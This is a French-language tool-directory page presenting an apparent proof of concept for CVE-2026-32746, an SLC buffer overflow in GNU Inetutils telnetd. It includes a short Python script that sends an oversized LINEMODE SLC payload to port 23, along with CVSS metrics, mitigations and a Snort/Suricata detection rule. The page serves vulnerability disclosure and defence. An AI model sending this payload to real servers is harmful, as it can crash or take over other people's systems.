Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-32746 — Preuve de concept d'exploitation pour CVE-2026-32746, une vulnérabilité critique d'exécution de code à distance dans GNU Inetutils telnetd via un débordement de tampon SLC en mode LINEMODE. Inclut une analyse technique, les métriques CVSS et des recommandations d'atténuation. | Kitploit
Outils/GitHubGitHub/kaleth4/cve-2026-32746
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubkaleth4/cve-2026-32746

CVE-2026-32746

Preuve de concept d'exploitation pour CVE-2026-32746, une vulnérabilité critique d'exécution de code à distance dans GNU Inetutils telnetd via un débordement de tampon SLC en mode LINEMODE. Inclut une analyse technique, les métriques CVSS et des recommandations d'atténuation.

Voir le dépôt
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 CVE-2026-32746 GNU Inetutils Telnetd RCE

🔥 📌 Résumé Exécutif

Vulnérabilité Critique | CVSS 9.8 | Exécution de Code à Distance ! Concerne : GNU Inetutils Telnetd (versions antérieures à 2.7) Type : Écriture hors limites (OOB Write) dans le gestionnaire de sous-options LINEMODE SLC Vecteur d'attaque : Réseau (Port 23) | Aucune authentification requise Impact : RCE avec les privilèges du processus Telnetd


🎯 📖 Description Technique

Une écriture hors limites (OOB Write) a été identifiée dans la fonction add_slc du démon de . Cette faille permet à un attaquant distant d' en manipulant les du protocole Telnet.

telnetd
GNU Inetutils
injecter du code arbitraire
sous-options SLC (Set Local Characters)

🔍 Détails Clés

  • Fonction Vulnérable : add_slc (traitement des caractères locaux).
  • Cause Racine : Absence de validation des limites dans le tampon interne.
  • Exploitation : Envoi massif de séquences malveillantes LINEMODE SLC.
  • Conditions requises : Aucune (accès direct au port 23).

🛠️ 💻 Preuve de Concept (PoC)

Un attaquant peut exploiter cette vulnérabilité via un payload Telnet malveillant qui sature le tampon interne :

root@kitploit:~
#!/usr/bin/env python3
import socket
import sys

# CVE-2026-32746 - LINEMODE SLC Overflow
# IAC SB LINEMODE SLC <list> IAC SE
IAC  = b'\xff'
SB   = b'\xfa'
SE   = b'\xf0'
LINEMODE = b'\x22'
SLC  = b'\x03'

target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"

# Payload généré pour déborder add_slc
malicious_slc = b"\x01\x03\x41" * 600  # Répétition 600 fois

payload = IAC + SB + LINEMODE + SLC + malicious_slc + IAC + SE

print(f"[*] Envoi du payload malveillant à {target}...")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((target, 23))
    s.sendall(payload)
    print("[+] Payload livré. Vérification du crash du service/RCE...")

⚠️ AVERTISSEMENT ! Ce code est uniquement à des fins éducatives et de recherche. Son utilisation sur des systèmes sans autorisation est illégale.


📊 📈 Métriques de Risque (CVSS 3.1)

MétriqueValeurDescription
VecteurAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HÀ distance, sans authentification
Score9.8 (CRITIQUE) 🔴Impact élevé sur la confidentialité, l'intégrité et la disponibilité
Publication13 mars 2026Dernière modification : 5 mai 2026

🛡️ 🔒 Atténuation et Solutions

🚀 Solution Immédiate

✅ Mettre à jour GNU Inetutils vers la version corrigée (post-2.7).

⚡ Contournements

🔹 Désactiver telnetd et migrer vers SSH (recommandé). 🔹 Bloquer le port 23 sur les pare-feu périmétriques. 🔹 Configurer IDS/IPS pour détecter les séquences LINEMODE SLC anormales.

🛡️ Configuration de Sécurité Supplémentaire

  • Règles Snort/Suricata :
    root@kitploit:~
    alert tcp any any -> any 23 (msg:"CVE-2026-32746 - LINEMODE SLC Overflow"; content:"|FF FA 22 03|"; depth:5; threshold:type both, track by_src, count 1, seconds 1; sid:1000001; rev:1;)
    
Télécharger l’outil